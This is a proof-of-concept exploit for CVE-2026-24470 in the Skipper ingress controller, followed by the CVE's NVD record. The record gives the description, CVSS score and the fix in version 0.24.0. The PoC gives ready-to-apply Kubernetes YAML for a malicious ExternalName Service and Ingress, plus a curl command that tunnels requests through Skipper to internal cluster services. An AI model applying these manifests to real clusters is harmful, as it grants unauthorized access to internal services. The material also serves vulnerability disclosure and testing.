CVE-2026-24470

# CVE-2026-24470 PoC - Skipper Ingress Controller Security Bypass # This PoC demonstrates how an attacker with low privileges can access internal services # Step 1: Create a malicious ExternalName Service pointing to internal service apiVersion: v1 kind: Service metadata: name: malicious-externalname namespace: attacker-namespace spec: type: ExternalName externalName: internal-service.default.svc.cluster.local --- # Step 2: Create Ingress to route external traffic through Skipper to the ExternalName Service apiVersion: networking.k8s.io/v1 kind: Ingress metadata: name: malicious-ingress namespace: attacker-namespace annotations: kubernetes.io/ingress.class: skipper spec: rules: - host: attacker.example.com http: paths: - path: / pathType: Prefix backend: service: name: malicious-externalname port: number: 80 --- # Exploit: Send request through Skipper to access internal service # curl -H 'Host: attacker.example.com' http://<skipper-ingress-ip>/ # The request will be forwarded to internal-service.default.svc.cluster.local

{"cve": {"id": "CVE-2026-24470", "sourceIdentifier": "[email protected]", "published": "2026-01-26T23:16:09.123", "lastModified": "2026-02-18T17:39:44.020", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Skipper is an HTTP router and reverse proxy for service composition. Prior to version 0.24.0, when running Skipper as an Ingress controller, users with permissions to create an Ingress and a Service of type ExternalName can create routes that enable them to use Skipper's network access to reach internal services. Version 0.24.0 disables Kubernetes ExternalName by default. As a workaround, developers can allow list targets of an ExternalName and allow list via regular expressions."}, {"lang": "es", "value": "Skipper es un router HTTP y proxy inverso para la composición de servicios. Antes de la versión 0.24.0, al ejecutar Skipper como un controlador Ingress, los usuarios con permisos para crear un Ingress y un Servicio de tipo ExternalName pueden crear rutas que les permiten usar el acceso de red de Skipper para alcanzar servicios internos. La versión 0.24.0 deshabilita Kubernetes ExternalName por defecto. Como solución alternativa, los desarrolladores pueden incluir en la lista de permitidos los objetivos de un ExternalName e incluir en la lista de permitidos mediante expresiones regulares."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-441"}, {"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zalando:skipper:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.24.0", "matchCriteriaId": "DEBBEB5D-B41E-48C3-BF83-F5018AAA9D12"}]}]}], "references": [{"url": "https://github.com/zalando/skipper/commit/a4c87ce029a58eb8e1c2c1f93049194a39cf6219", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/zalando/skipper/security/advisories/GHSA-mxxc-p822-2hx9", "source": "[email protected]", "tags": ["Vendor Advisory", "Mitigation"]}, {"url": "https://kubernetes.io/docs/concepts/services-networking/service/#externalname", "source": "[email protected]", "tags": ["Product"]}]}}